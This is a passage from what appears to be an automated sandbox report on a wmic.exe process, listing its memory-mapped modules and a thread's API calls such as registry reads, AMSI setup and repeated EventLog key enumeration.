pagefile_0x00000233e1330000	0x233e1330000	0x233e134ffff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x00000233e1330000	0x233e1330000	0x233e1330fff	Pagefile Backed Memory	Readable, Writable	-
counters.dat	0x233e1340000	0x233e1340fff	Memory Mapped File	Readable, Writable	-
pagefile_0x00000233e1350000	0x233e1350000	0x233e1350fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x00000233e1360000	0x233e1360000	0x233e136ffff	Pagefile Backed Memory	Readable	-
private_0x00000233e1370000	0x233e1370000	0x233e1371fff	Private Memory	Readable, Writable	-
private_0x00000233e1370000	0x233e1370000	0x233e1376fff	Private Memory	Readable, Writable	-
private_0x00000233e1380000	0x233e1380000	0x233e138ffff	Private Memory	Readable, Writable	-
c_20127.nls	0x233e1390000	0x233e13a0fff	Memory Mapped File	Readable	-
pagefile_0x00000233e13b0000	0x233e13b0000	0x233e13b0fff	Pagefile Backed Memory	Readable	-
private_0x00000233e1440000	0x233e1440000	0x233e144ffff	Private Memory	Readable, Writable	-
private_0x00000233e14d0000	0x233e14d0000	0x233e14dffff	Private Memory	Readable, Writable	-
private_0x00000233e14f0000	0x233e14f0000	0x233e14fffff	Private Memory	Readable, Writable	-
sortdefault.nls	0x233e1500000	0x233e1836fff	Memory Mapped File	Readable	-
private_0x00000233e1840000	0x233e1840000	0x233e1a2ffff	Private Memory	Readable, Writable	-
private_0x00000233e1840000	0x233e1840000	0x233e195ffff	Private Memory	Readable, Writable	-
kernelbase.dll.mui	0x233e1840000	0x233e191ffff	Memory Mapped File	Readable	-
private_0x00000233e1950000	0x233e1950000	0x233e195ffff	Private Memory	Readable, Writable	-
pagefile_0x00000233e1960000	0x233e1960000	0x233e1a1bfff	Pagefile Backed Memory	Readable	-
private_0x00000233e1a20000	0x233e1a20000	0x233e1a2ffff	Private Memory	Readable, Writable	-
private_0x00000233e1a30000	0x233e1a30000	0x233e1e2ffff	Private Memory	Readable, Writable	-
pagefile_0x00000233e1e30000	0x233e1e30000	0x233e1fb7fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000233e1fc0000	0x233e1fc0000	0x233e2140fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000233e2150000	0x233e2150000	0x233e354ffff	Pagefile Backed Memory	Readable	-
private_0x00000233e3550000	0x233e3550000	0x233e370ffff	Private Memory	Readable, Writable	-
rpcss.dll	0x233e3550000	0x233e362cfff	Memory Mapped File	Readable	-
private_0x00000233e3550000	0x233e3550000	0x233e364ffff	Private Memory	Readable, Writable	-
private_0x00000233e3700000	0x233e3700000	0x233e370ffff	Private Memory	Readable, Writable	-
private_0x00000233e3710000	0x233e3710000	0x233e380ffff	Private Memory	Readable, Writable	-
private_0x00000233e3810000	0x233e3810000	0x233e390ffff	Private Memory	Readable, Writable	-
private_0x00000233e3910000	0x233e3910000	0x233e3a0ffff	Private Memory	Readable, Writable	-
pagefile_0x00000233e3a10000	0x233e3a10000	0x233e3e0afff	Pagefile Backed Memory	Readable	-
private_0x00000233e3f40000	0x233e3f40000	0x233e3f4ffff	Private Memory	Readable, Writable	-
pagefile_0x00007df5ff900000	0x7df5ff900000	0x7ff5ff8fffff	Pagefile Backed Memory	-	-
pagefile_0x00007ff66de40000	0x7ff66de40000	0x7ff66df3ffff	Pagefile Backed Memory	Readable	-
pagefile_0x00007ff66df40000	0x7ff66df40000	0x7ff66df62fff	Pagefile Backed Memory	Readable	-
wmic.exe	0x7ff66e670000	0x7ff66e6f1fff	Memory Mapped File	Readable, Writable, Executable	-
jscript.dll	0x7ffbf6140000	0x7ffbf6207fff	Memory Mapped File	Readable, Writable, Executable	-
amsi.dll	0x7ffbf68c0000	0x7ffbf68cffff	Memory Mapped File	Readable, Writable, Executable	-
wmi2xml.dll	0x7ffbf7780000	0x7ffbf779bfff	Memory Mapped File	Readable, Writable, Executable	-
msoxmlmf.dll	0x7ffbf77c0000	0x7ffbf77d2fff	Memory Mapped File	Readable, Writable, Executable	-
mscoreei.dll	0x7ffbf8a40000	0x7ffbf8ad7fff	Memory Mapped File	Readable, Writable, Executable	-
mscoree.dll	0x7ffbf8ae0000	0x7ffbf8b47fff	Memory Mapped File	Readable, Writable, Executable	-
msxml3.dll	0x7ffbfc900000	0x7ffbfcb3efff	Memory Mapped File	Readable, Writable, Executable	-
framedynos.dll	0x7ffbfe150000	0x7ffbfe19dfff	Memory Mapped File	Readable, Writable, Executable	-
mskeyprotect.dll	0x7ffc03cc0000	0x7ffc03cd3fff	Memory Mapped File	Readable, Writable, Executable	-
ncryptsslp.dll	0x7ffc03d40000	0x7ffc03d5dfff	Memory Mapped File	Readable, Writable, Executable	-
vcruntime140.dll	0x7ffc05ea0000	0x7ffc05eb5fff	Memory Mapped File	Readable, Writable, Executable	-
wmiutils.dll	0x7ffc063e0000	0x7ffc06404fff	Memory Mapped File	Readable, Writable, Executable	-
wbemsvc.dll	0x7ffc06410000	0x7ffc06423fff	Memory Mapped File	Readable, Writable, Executable	-
fastprox.dll	0x7ffc06430000	0x7ffc06525fff	Memory Mapped File	Readable, Writable, Executable	-
wininet.dll	0x7ffc06700000	0x7ffc0698dfff	Memory Mapped File	Readable, Writable, Executable	-
wbemprox.dll	0x7ffc06b80000	0x7ffc06b90fff	Memory Mapped File	Readable, Writable, Executable	-
urlmon.dll	0x7ffc079e0000	0x7ffc07b97fff	Memory Mapped File	Readable, Writable, Executable	-
wbemcomn.dll	0x7ffc07e60000	0x7ffc07edefff	Memory Mapped File	Readable, Writable, Executable	-
version.dll	0x7ffc08000000	0x7ffc08009fff	Memory Mapped File	Readable, Writable, Executable	-
rasadhlp.dll	0x7ffc0ad10000	0x7ffc0ad19fff	Memory Mapped File	Readable, Writable, Executable	-
ondemandconnroutehelper.dll	0x7ffc0b3b0000	0x7ffc0b3c4fff	Memory Mapped File	Readable, Writable, Executable	-
fwpuclnt.dll	0x7ffc0c360000	0x7ffc0c3c6fff	Memory Mapped File	Readable, Writable, Executable	-
winnsi.dll	0x7ffc0c430000	0x7ffc0c43afff	Memory Mapped File	Readable, Writable, Executable	-
iphlpapi.dll	0x7ffc0c8d0000	0x7ffc0c907fff	Memory Mapped File	Readable, Writable, Executable	-
iertutil.dll	0x7ffc0d740000	0x7ffc0dac1fff	Memory Mapped File	Readable, Writable, Executable	-
winhttp.dll	0x7ffc0f200000	0x7ffc0f2c7fff	Memory Mapped File	Readable, Writable, Executable	-
dwmapi.dll	0x7ffc119f0000	0x7ffc11a11fff	Memory Mapped File	Readable, Writable, Executable	-
uxtheme.dll	0x7ffc123a0000	0x7ffc12435fff	Memory Mapped File	Readable, Writable, Executable	-
dnsapi.dll	0x7ffc12490000	0x7ffc12539fff	Memory Mapped File	Readable, Writable, Executable	-
ucrtbase.dll	0x7ffc12bc0000	0x7ffc12cb3fff	Memory Mapped File	Readable, Writable, Executable	-
schannel.dll	0x7ffc12f70000	0x7ffc12fe9fff	Memory Mapped File	Readable, Writable, Executable	-
rsaenh.dll	0x7ffc13030000	0x7ffc13063fff	Memory Mapped File	Readable, Writable, Executable	-
dpapi.dll	0x7ffc13070000	0x7ffc13079fff	Memory Mapped File	Readable, Writable, Executable	-
mswsock.dll	0x7ffc132f0000	0x7ffc1334bfff	Memory Mapped File	Readable, Writable, Executable	-
cryptsp.dll	0x7ffc133a0000	0x7ffc133b6fff	Memory Mapped File	Readable, Writable, Executable	-
cryptbase.dll	0x7ffc134c0000	0x7ffc134cafff	Memory Mapped File	Readable, Writable, Executable	-
ntasn1.dll	0x7ffc13550000	0x7ffc13589fff	Memory Mapped File	Readable, Writable, Executable	-
ncrypt.dll	0x7ffc13590000	0x7ffc135b6fff	Memory Mapped File	Readable, Writable, Executable	-
sspicli.dll	0x7ffc136a0000	0x7ffc136ccfff	Memory Mapped File	Readable, Writable, Executable	-
bcrypt.dll	0x7ffc13950000	0x7ffc13978fff	Memory Mapped File	Readable, Writable, Executable	-
profapi.dll	0x7ffc13a20000	0x7ffc13a33fff	Memory Mapped File	Readable, Writable, Executable	-
powrprof.dll	0x7ffc13a40000	0x7ffc13a8afff	Memory Mapped File	Readable, Writable, Executable	-
msasn1.dll	0x7ffc13a90000	0x7ffc13a9ffff	Memory Mapped File	Readable, Writable, Executable	-
kernel.appcore.dll	0x7ffc13aa0000	0x7ffc13aaefff	Memory Mapped File	Readable, Writable, Executable	-
wintrust.dll	0x7ffc13bf0000	0x7ffc13c44fff	Memory Mapped File	Readable, Writable, Executable	-
windows.storage.dll	0x7ffc13c50000	0x7ffc14293fff	Memory Mapped File	Readable, Writable, Executable	-
crypt32.dll	0x7ffc142c0000	0x7ffc14486fff	Memory Mapped File	Readable, Writable, Executable	-
cfgmgr32.dll	0x7ffc14490000	0x7ffc144d2fff	Memory Mapped File	Readable, Writable, Executable	-
bcryptprimitives.dll	0x7ffc144e0000	0x7ffc14549fff	Memory Mapped File	Readable, Writable, Executable	-
kernelbase.dll	0x7ffc14550000	0x7ffc14737fff	Memory Mapped File	Readable, Writable, Executable	-
shcore.dll	0x7ffc14740000	0x7ffc147f4fff	Memory Mapped File	Readable, Writable, Executable	-
ole32.dll	0x7ffc14800000	0x7ffc14942fff	Memory Mapped File	Readable, Writable, Executable	-
rpcrt4.dll	0x7ffc14950000	0x7ffc14a6bfff	Memory Mapped File	Readable, Writable, Executable	-
shell32.dll	0x7ffc14a70000	0x7ffc15fcefff	Memory Mapped File	Readable, Writable, Executable	-
combase.dll	0x7ffc15fd0000	0x7ffc1624cfff	Memory Mapped File	Readable, Writable, Executable	-
advapi32.dll	0x7ffc16250000	0x7ffc162f6fff	Memory Mapped File	Readable, Writable, Executable	-
msvcrt.dll	0x7ffc164b0000	0x7ffc1654cfff	Memory Mapped File	Readable, Writable, Executable	-
clbcatq.dll	0x7ffc16550000	0x7ffc165f6fff	Memory Mapped File	Readable, Writable, Executable	-
sechost.dll	0x7ffc16660000	0x7ffc166bafff	Memory Mapped File	Readable, Writable, Executable	-
imm32.dll	0x7ffc167d0000	0x7ffc1680afff	Memory Mapped File	Readable, Writable, Executable	-
msctf.dll	0x7ffc16810000	0x7ffc16969fff	Memory Mapped File	Readable, Writable, Executable	-
ws2_32.dll	0x7ffc16970000	0x7ffc169dafff	Memory Mapped File	Readable, Writable, Executable	-
gdi32.dll	0x7ffc169e0000	0x7ffc16b65fff	Memory Mapped File	Readable, Writable, Executable	-
nsi.dll	0x7ffc16fa0000	0x7ffc16fa7fff	Memory Mapped File	Readable, Writable, Executable	-
oleaut32.dll	0x7ffc16fb0000	0x7ffc17070fff	Memory Mapped File	Readable, Writable, Executable	-
kernel32.dll	0x7ffc17120000	0x7ffc171ccfff	Memory Mapped File	Readable, Writable, Executable	-
user32.dll	0x7ffc171d0000	0x7ffc17325fff	Memory Mapped File	Readable, Writable, Executable	-
coml2.dll	0x7ffc17330000	0x7ffc1739efff	Memory Mapped File	Readable, Writable, Executable	-
shlwapi.dll	0x7ffc173a0000	0x7ffc173f1fff	Memory Mapped File	Readable, Writable, Executable	-
ntdll.dll	0x7ffc17400000	0x7ffc175c0fff	Memory Mapped File	Readable, Writable, Executable	-
For performance reasons, the remaining 131 entries are omitted. The remaining entries can be found in flog.txt.

Threads

Thread 0xdf0

338

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\system32\wbem\wmic.exe, base_address = 0x7ff66e670000	1	Fn
COM	Create	interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Computer Name	result_out = X2VS1CUM	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54	1	Fn
COM	Create	interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Local Time, time = 2018-06-26 22:59:05 (Local Time)	1	Fn
COM	Create	interface = BFBF883A-CAD7-11D3-A11B-00105A1F515A, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wbem\wmic.exe, file_name_orig = C:\Windows\System32\Wbem\WMIC.exe, size = 260	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc17120000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x7ffc145c02d0	1	Fn
Module	Load	module_name = amsi.dll, base_address = 0x7ffbf68c0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\amsi.dll, function = AmsiInitialize, address_out = 0x7ffbf68c2260	1	Fn
Module	Get Address	module_name = c:\windows\system32\amsi.dll, function = AmsiScanString, address_out = 0x7ffbf68c26b0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffc14550000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffc145af670	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffc14611540	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
System	Get Time	type = Ticks, time = 133156	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
System	Get Info	type = Operating System	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Windows\System32\Wbem\WMIC.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
System	Get Info	type = Hardware Information	1	Fn
Environment	Get Environment String	name = MshEnableTrace	17	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
